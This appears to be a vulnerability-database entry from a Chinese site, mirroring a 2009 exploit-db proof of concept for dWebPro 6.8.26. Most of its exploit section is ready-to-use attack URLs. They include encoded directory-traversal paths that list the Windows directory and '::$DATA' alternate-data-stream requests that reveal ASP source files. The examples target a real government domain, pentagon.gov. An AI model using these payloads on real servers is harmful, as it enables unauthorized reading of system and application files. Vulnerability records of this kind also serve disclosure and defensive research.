dwebpro 6.8.26 - Directory Traversal / File Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057750 漏洞类型
发布时间 2009-04-27 更新时间 2009-04-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8537
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
############################################
       dWebPro v 6.8.26
============================================
   Remote Directory Tarvelsal  && 
   Remote File Disclosure p0c's
============================================
   Download : http://www.dwebpro.com/downloads/dwebpro_6.8.26.exe
============================================
   Autor : Alfons Luja
   Tested on Win32 xp home 
############################################

   poc 1 Directory Travelsal : we can list directory
   
   http://www.penatgon.gov:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
   http://www.pentagon.gov:8080/..%2f..%2f..%2fWINDOWS%2f

   poc 2 File Disclosure : we can disclosure any file in a DOCUMENT_ROOT directory 
         by using Alternative Data Streams
   
   http://www.pentagon.gov:8080/..\/www/500-100-js.asp::$DATA
   http://www.pentagon.gov:8080/demos/aspclassic/asp_registry.asp::$DATA

+++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-04-27]